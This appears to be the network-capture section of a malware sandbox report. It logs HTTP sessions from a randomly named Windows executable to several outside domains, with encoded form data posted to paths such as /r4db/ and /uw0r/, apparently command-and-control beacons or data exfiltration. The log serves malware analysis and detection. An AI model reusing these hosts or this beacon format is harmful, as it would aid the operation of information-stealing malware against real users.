0	192.168.2.6	49723	156.226.63.13	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:02.658382893 CET	393	OUT	GET /30sl/?JDE4I=Cr640F7p&jT=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t6OiemU0Jj6NmSlmlnFqeO8K+H2svpJMc7ylVJl401FrjRLqc2Lo= HTTP/1.1 Host: www.wuyyv4tq.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Jan 10, 2025 18:02:03.550158978 CET	289	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 10 Jan 2025 17:02:03 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49725	47.83.1.90	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:18.708327055 CET	647	OUT	POST /r4db/ HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 207 Origin: http://www.cloijz.info Referer: http://www.cloijz.info/r4db/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 50 67 6c 47 64 4e 57 46 51 63 52 32 48 51 61 76 72 66 61 78 2f 4b 69 7a 76 62 45 6b 74 71 47 55 32 6b 56 49 78 62 36 72 67 37 35 55 67 4e 36 6f 56 6a 6d 66 70 70 47 47 4b 31 64 49 35 45 44 6b 4c 44 33 59 71 6b 33 73 4e 77 42 33 2f 69 39 34 6e 50 56 64 77 76 42 54 58 69 39 48 4e 41 39 6f 5a 2b 36 4c 59 37 30 6c 6f 37 31 7a 71 73 4f 2f 59 33 69 75 62 4d 72 55 32 48 34 6e 2b 74 4e 54 41 46 63 47 52 66 66 39 4e 79 50 64 62 34 2f 68 78 43 64 32 65 7a 4b 59 55 31 2f 53 2b 48 55 2f 46 57 49 54 73 58 71 56 44 6f 41 51 65 39 32 4c 6e 7a 43 6d 50 6b 79 73 79 78 5a 4e 2f 2f 7a 71 Data Ascii: jT=ISXxSPt1zuOVPglGdNWFQcR2HQavrfax/KizvbEktqGU2kVIxb6rg75UgN6oVjmfppGGK1dI5EDkLD3Yqk3sNwB3/i94nPVdwvBTXi9HNA9oZ+6LY70lo71zqsO/Y3iubMrU2H4n+tNTAFcGRff9NyPdb4/hxCd2ezKYU1/S+HU/FWITsXqVDoAQe92LnzCmPkysyxZN//zq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49726	47.83.1.90	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:21.255484104 CET	671	OUT	POST /r4db/ HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 231 Origin: http://www.cloijz.info Referer: http://www.cloijz.info/r4db/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 41 68 31 47 66 73 57 46 58 38 52 35 4c 77 61 76 6b 2f 61 31 2f 4b 75 7a 76 5a 6f 30 74 34 69 55 33 47 39 49 6a 76 57 72 6a 37 35 55 34 39 36 6e 4e 44 6d 55 70 70 37 37 4b 78 42 49 35 45 48 6b 4c 44 6e 59 71 79 2f 76 4e 67 42 31 32 43 39 2b 36 66 56 64 77 76 42 54 58 69 42 74 4e 45 5a 6f 59 4c 71 4c 62 61 30 69 68 62 31 30 69 4d 4f 2f 63 33 69 71 62 4d 71 78 32 44 35 49 2b 75 35 54 41 46 4d 47 52 4f 66 38 48 79 50 54 57 59 2b 4b 37 69 59 41 47 46 50 4f 64 58 54 4e 67 6e 30 69 4e 41 56 4a 77 6b 71 32 52 34 67 53 65 2f 75 35 6e 54 43 4d 4e 6b 4b 73 67 6d 56 71 77 4c 57 4a 68 6c 50 6f 35 42 54 6f 77 4f 54 70 63 36 42 6e 4c 64 2f 6e 59 67 3d 3d Data Ascii: jT=ISXxSPt1zuOVAh1GfsWFX8R5Lwavk/a1/KuzvZo0t4iU3G9IjvWrj75U496nNDmUpp77KxBI5EHkLDnYqy/vNgB12C9+6fVdwvBTXiBtNEZoYLqLba0ihb10iMO/c3iqbMqx2D5I+u5TAFMGROf8HyPTWY+K7iYAGFPOdXTNgn0iNAVJwkq2R4gSe/u5nTCMNkKsgmVqwLWJhlPo5BTowOTpc6BnLd/nYg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49727	47.83.1.90	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:23.803492069 CET	1684	OUT	POST /r4db/ HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Origin: http://www.cloijz.info Referer: http://www.cloijz.info/r4db/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 49 53 58 78 53 50 74 31 7a 75 4f 56 41 68 31 47 66 73 57 46 58 38 52 35 4c 77 61 76 6b 2f 61 31 2f 4b 75 7a 76 5a 6f 30 74 34 71 55 33 33 64 49 78 2b 57 72 69 37 35 55 6d 4e 36 6b 4e 44 6d 4e 70 70 6a 2f 4b 32 4a 2b 35 43 62 6b 45 41 2f 59 37 77 58 76 65 41 42 31 37 69 39 37 6e 50 56 79 77 76 52 58 58 69 78 74 4e 45 5a 6f 59 4b 61 4c 4d 62 30 69 6a 62 31 7a 71 73 50 77 59 33 69 53 62 4e 44 4d 32 44 39 69 39 64 68 54 41 68 51 47 55 38 6e 38 4c 79 50 52 59 34 2b 53 37 6a 6b 54 47 46 37 4b 64 53 48 33 67 6b 6f 69 4f 30 45 46 72 77 71 70 41 37 4d 66 50 65 43 65 67 58 4b 2f 4e 6d 79 2f 74 33 31 6b 33 66 6d 33 68 78 7a 71 79 78 79 37 31 73 33 70 66 4e 45 49 43 4d 75 77 48 47 57 32 51 6e 36 58 41 43 6a 35 77 49 48 67 68 32 2b 6b 38 50 70 61 35 74 64 65 32 77 48 59 61 62 48 72 31 32 45 42 34 56 6d 49 49 39 76 70 6d 55 4f 44 30 74 70 41 39 51 59 50 54 67 67 33 6d 6e 36 6b 62 32 76 46 57 70 77 50 69 43 61 7a 2b 6c 37 61 46 46 67 56 74 55 74 63 6f 74 6f 65 34 44 74 44 53 46 4a 44 63 6c 6d 36 30 39 46 [TRUNCATED] Data Ascii: jT=ISXxSPt1zuOVAh1GfsWFX8R5Lwavk/a1/KuzvZo0t4qU33dIx+Wri75UmN6kNDmNppj/K2J+5CbkEA/Y7wXveAB17i97nPVywvRXXixtNEZoYKaLMb0ijb1zqsPwY3iSbNDM2D9i9dhTAhQGU8n8LyPRY4+S7jkTGF7KdSH3gkoiO0EFrwqpA7MfPeCegXK/Nmy/t31k3fm3hxzqyxy71s3pfNEICMuwHGW2Qn6XACj5wIHgh2+k8Ppa5tde2wHYabHr12EB4VmII9vpmUOD0tpA9QYPTgg3mn6kb2vFWpwPiCaz+l7aFFgVtUtcotoe4DtDSFJDclm609F1RBTnRgJPoImFvLn1At1ow9uCJmtc2tm2/qr4Vq8rKAPiRXzmEEawfxa4lTaQ2am6pFud43mqphVfPb8YGiqsk41Lko4BOBwb/GKMQQFTAMJYYUvO7M0/D5cWryR4oIdFLWNneQtwtQyzuUkpV6SdEVKxRtaicBcZXsbOgX7esaZScPqPLaDILHYOC8/tMJdrXETuPYQOP3g5L8XW1ogd9G2L95Aay0lw5Sn1iN12QHiD3qOwoqvGRCFTjqjW0msyAJHIDbdqdm0iSorYflEivEJVjudrLhOdzSnAuXisvixfZxHBiZQvQFXJeeqM7v5Jpbt7ITUCVm0Qi3y3FV7U6aPdzx7C5/UK97G/ksb/WjAAYadvwxcFMyLvpf0DI8Yx1fLlPLb25criwoCy1BL5EcI0N18n0LZo3wUwC8k1TE7QaauTEkLsuBKNSg9oNhRYPdaJgxqkdu7XnFmhzm71nGJmmPR+RPXAXOsSQi0+ObEolh5g1YcAd+76T6R1KLOZaF4g9+AkCMAbXl1g3UN5aTd1zx+oXWFCq7ytP5pP+5kRWJjGFVw9gw7vlHIRYQAURKkcq/CKL4h36tt3o31sslcC3WEi+YlT1hk8AZMwppe78rWMDrc0sjpGt4rW5AJn6dG7dLvyhrUVGFFqfSdH91ZsglViExiyw [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49728	47.83.1.90	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:26.342181921 CET	392	OUT	GET /r4db/?jT=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpDFZu5ThYyaNjoqhPdko0IWZZd4mabolfnI5igKK/UEridKP27nc=&JDE4I=Cr640F7p HTTP/1.1 Host: www.cloijz.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Jan 10, 2025 18:02:27.892240047 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 17:02:27 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49729	18.143.155.63	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:33.115906954 CET	665	OUT	POST /uw0r/ HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 207 Origin: http://www.xinchaocjcela.net Referer: http://www.xinchaocjcela.net/uw0r/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 71 4e 73 6f 42 79 44 43 72 78 32 79 52 67 73 2f 51 6e 75 2b 70 39 55 64 44 39 48 4e 37 77 57 34 39 53 73 6c 46 4d 52 61 30 74 33 2f 79 52 61 53 31 4d 5a 4d 2f 42 6f 50 68 53 47 57 4b 33 4c 56 75 42 64 51 38 37 37 43 73 75 5a 77 31 76 33 70 63 46 4b 78 46 59 6d 4c 6d 64 37 71 49 4c 59 43 48 2f 37 75 6e 57 61 35 6d 67 4a 7a 31 64 4f 79 66 37 4e 69 63 65 47 69 45 55 4c 49 50 68 70 2f 69 75 47 4c 6d 79 35 70 42 6a 4c 67 2b 78 31 58 36 38 47 36 51 66 55 38 54 4f 6a 76 33 42 66 33 76 6f 47 73 78 70 53 64 5a 32 51 35 7a 51 6e 76 69 44 69 32 6d 78 39 2f 45 37 42 78 62 51 62 71 78 56 53 67 46 75 5a 6b 61 36 42 35 Data Ascii: jT=qNsoByDCrx2yRgs/Qnu+p9UdD9HN7wW49SslFMRa0t3/yRaS1MZM/BoPhSGWK3LVuBdQ877CsuZw1v3pcFKxFYmLmd7qILYCH/7unWa5mgJz1dOyf7NiceGiEULIPhp/iuGLmy5pBjLg+x1X68G6QfU8TOjv3Bf3voGsxpSdZ2Q5zQnviDi2mx9/E7BxbQbqxVSgFuZka6B5
Jan 10, 2025 18:02:34.522062063 CET	732	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:02:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=34e139217989708923e5fa5c13890630\|8.46.123.189\|1736528554\|1736528554\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49730	18.143.155.63	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:35.666156054 CET	689	OUT	POST /uw0r/ HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 231 Origin: http://www.xinchaocjcela.net Referer: http://www.xinchaocjcela.net/uw0r/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 71 4e 73 6f 42 79 44 43 72 78 32 79 51 44 30 2f 57 41 36 2b 6f 64 55 65 47 39 48 4e 69 67 57 38 39 56 6b 6c 46 4e 55 42 30 59 6e 2f 78 77 4b 53 30 4e 5a 4d 71 42 6f 50 72 79 48 63 4f 33 4c 43 75 42 42 59 38 2f 7a 43 73 74 6c 77 31 71 4c 70 63 57 69 32 45 49 6d 4e 2f 4e 37 30 56 37 59 43 48 2f 37 75 6e 58 2b 48 6d 67 52 7a 79 75 57 79 65 61 4e 68 56 2b 47 68 4a 45 4c 49 65 78 70 37 69 75 47 35 6d 7a 55 45 42 68 6a 67 2b 77 6c 58 36 4a 79 35 4c 50 55 36 63 75 69 52 7a 44 76 79 70 76 6e 7a 2f 4a 61 78 42 56 55 6f 79 6d 36 31 2b 77 69 56 30 68 64 39 45 35 5a 44 62 77 62 41 7a 56 71 67 58 35 56 44 56 4f 6b 61 6f 51 33 53 65 38 4a 67 32 76 6d 79 42 54 34 44 70 6e 55 57 57 77 3d 3d Data Ascii: jT=qNsoByDCrx2yQD0/WA6+odUeG9HNigW89VklFNUB0Yn/xwKS0NZMqBoPryHcO3LCuBBY8/zCstlw1qLpcWi2EImN/N70V7YCH/7unX+HmgRzyuWyeaNhV+GhJELIexp7iuG5mzUEBhjg+wlX6Jy5LPU6cuiRzDvypvnz/JaxBVUoym61+wiV0hd9E5ZDbwbAzVqgX5VDVOkaoQ3Se8Jg2vmyBT4DpnUWWw==
Jan 10, 2025 18:02:37.050658941 CET	732	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:02:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=82d0efe4ae3507ecb6775bf283272a35\|8.46.123.189\|1736528556\|1736528556\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49731	18.143.155.63	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:38.210139036 CET	1702	OUT	POST /uw0r/ HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Origin: http://www.xinchaocjcela.net Referer: http://www.xinchaocjcela.net/uw0r/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 71 4e 73 6f 42 79 44 43 72 78 32 79 51 44 30 2f 57 41 36 2b 6f 64 55 65 47 39 48 4e 69 67 57 38 39 56 6b 6c 46 4e 55 42 30 62 48 2f 79 41 57 53 79 75 42 4d 34 78 6f 50 31 69 48 66 4f 33 4c 36 75 42 4a 63 38 2f 2b 39 73 6f 68 77 31 50 48 70 49 33 69 32 50 49 6d 4e 69 64 37 31 49 4c 59 74 48 2f 72 71 6e 57 4f 48 6d 67 52 7a 79 70 75 79 59 4c 4e 68 54 2b 47 69 45 55 4c 55 50 68 70 54 69 74 33 4f 6d 7a 52 35 42 51 44 67 2b 51 56 58 34 62 71 35 57 66 55 34 5a 75 69 5a 7a 44 69 69 70 75 50 2f 2f 4b 47 62 42 58 49 6f 7a 41 48 49 38 44 47 52 70 6e 51 5a 52 61 6c 43 56 47 50 75 36 55 75 6e 52 76 5a 77 56 64 59 48 77 45 6a 7a 57 39 38 5a 6a 39 4b 2f 42 45 67 51 6f 46 4e 7a 43 4b 43 6d 4b 47 75 61 7a 62 73 75 64 31 52 6a 31 6a 31 66 55 77 63 70 4a 6d 38 39 73 51 69 37 43 69 69 58 65 46 7a 62 4a 72 57 46 59 33 64 71 2b 32 32 44 67 55 35 72 58 4b 53 36 7a 44 4b 4b 59 5a 6b 72 7a 4a 55 46 75 4a 46 42 59 6d 6c 41 51 35 32 64 70 61 76 55 50 5a 69 4a 38 6a 4b 46 6f 64 67 5a 46 46 74 41 2f 4b 67 61 45 5a 37 [TRUNCATED] Data Ascii: jT=qNsoByDCrx2yQD0/WA6+odUeG9HNigW89VklFNUB0bH/yAWSyuBM4xoP1iHfO3L6uBJc8/+9sohw1PHpI3i2PImNid71ILYtH/rqnWOHmgRzypuyYLNhT+GiEULUPhpTit3OmzR5BQDg+QVX4bq5WfU4ZuiZzDiipuP//KGbBXIozAHI8DGRpnQZRalCVGPu6UunRvZwVdYHwEjzW98Zj9K/BEgQoFNzCKCmKGuazbsud1Rj1j1fUwcpJm89sQi7CiiXeFzbJrWFY3dq+22DgU5rXKS6zDKKYZkrzJUFuJFBYmlAQ52dpavUPZiJ8jKFodgZFFtA/KgaEZ70Kg2UVE0zkZJM+2yY0Q3EUdAxG+zkX0Ss/FrLcQQK7NJRu4W/rTHYRx82EKmNnuEF0fz04oKVMwNcbwZ+tLfv5lxJrbjup8xBnWp448NEJQrYzBv0WKDGUdk3asNTnElY1lr8pzuGjYShtdNl9ydKJzLi10Zo6VYom5FQYf3BO43J5E/f57hieaZoBfaf/LVMTzH7Eo2F8WSoAgBcijsuGuGZyAZVCg0mOdyIo7xSFL4nQdzZqYc2ihy4deF/zJipbjm6p7BLVIBYgSY8npnFYKDD62WZgV3Y38begeF4Sn19IKuMK+/49gdiwZ0/Nb2G/UJC3YzS1oEPfKjq/RKywcZSoH8n+yTrQp5oDyL7WomCFmFRY22R/01qJAvVnFRpzOgg6snYAYb/uFBT1TeHlr9yKhTfjUhTeNQC9gqdF23xJVLDlJtaQ0M5OVT4KTCVzeeteuryI5RijUnVFYT/GHvkPGPrsP07qf1w1OwQjeJ2y2SqdqFG7wBh9InV9W7XNILGu6RVO1RctbZ1Vtghsu0/QThyCEFLaC82YMzlkoGn0kDxOEnaHzIGKBSR+b0if61qF1us6PhMtAgWO7BzkL9dBNqn3HgJy4LIXDnTltqBS76KHWzzYw4/HV8+sXtv0cvJ5426p06rSQiiwjiesMCfD40sMVnJn [TRUNCATED]
Jan 10, 2025 18:02:39.617923021 CET	732	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:02:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=ee9e3e16cf00c2580572f171b30b559e\|8.46.123.189\|1736528559\|1736528559\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 140

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49732	18.143.155.63	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:40.749044895 CET	398	OUT	GET /uw0r/?jT=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRIe6Bu//QfNw4XL/wkkPE7ytB3vyYAJMpbOGuBxSCYjIrp4GMsFs=&JDE4I=Cr640F7p HTTP/1.1 Host: www.xinchaocjcela.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0
Jan 10, 2025 18:02:42.140291929 CET	682	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 17:02:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=; path=/; domain=.www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=; path=/; domain=www.xinchaocjcela.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax; Set-Cookie: btst=672c2003608e7f31c8f7ade61d296eea\|8.46.123.189\|1736528561\|1736528561\|0\|1\|0; path=/; domain=.xinchaocjcela.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49733	104.21.18.171	80	1816	C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:02:47.191977024 CET	650	OUT	POST /ej4l/ HTTP/1.1 Host: www.grimbo.boats Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 207 Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/ej4l/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X) Word/14.51.0 Data Raw: 6a 54 3d 65 74 4b 73 2b 33 47 36 43 55 70 48 59 30 61 2b 4c 2f 4a 78 2b 6b 33 51 46 79 56 46 76 76 35 6d 4c 49 4f 44 2f 6f 78 67 6b 39 36 50 32 38 32 37 6a 6f 30 55 64 46 73 64 57 30 39 70 57 38 4b 31 77 73 69 30 64 2f 34 78 52 30 33 32 6b 62 2b 6b 49 72 6d 66 34 79 55 32 30 51 4a 74 68 5a 4d 57 4a 38 70 76 52 47 38 42 38 35 55 74 32 79 41 4b 78 32 6f 2f 43 33 52 34 64 56 4a 73 4b 58 55 74 5a 71 41 43 38 73 4e 37 38 30 61 49 61 66 4d 42 61 47 2f 56 4e 2b 44 30 42 56 62 38 41 7a 41 30 6f 4e 61 34 2b 62 71 49 56 54 6b 62 62 4b 65 6c 4f 37 44 73 78 4d 41 71 50 5a 6f 34 32 6f 65 55 71 64 6d 7a 4a 6b 69 76 34 42 39 65 Data Ascii: jT=etKs+3G6CUpHY0a+L/Jx+k3QFyVFvv5mLIOD/oxgk96P2827jo0UdFsdW09pW8K1wsi0d/4xR032kb+kIrmf4yU20QJthZMWJ8pvRG8B85Ut2yAKx2o/C3R4dVJsKXUtZqAC8sN780aIafMBaG/VN+D0BVb8AzA0oNa4+bqIVTkbbKelO7DsxMAqPZo42oeUqdmzJkiv4B9e
Jan 10, 2025 18:02:47.831195116 CET	1079	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 17:02:47 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n49S4vjDGsfSmzHYJYEQfNAC2oifcEC4Fdku39PTUMGsRt%2Btc2xQ9WO6VnsraxB4daZdaIzCet6225vma7QwqeEarvCmNNOoYahbbSAJ4HgQN1s1J8qQ5RXMcO5ovMOBcZW2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffe3c9b6a0142b1-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=650&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 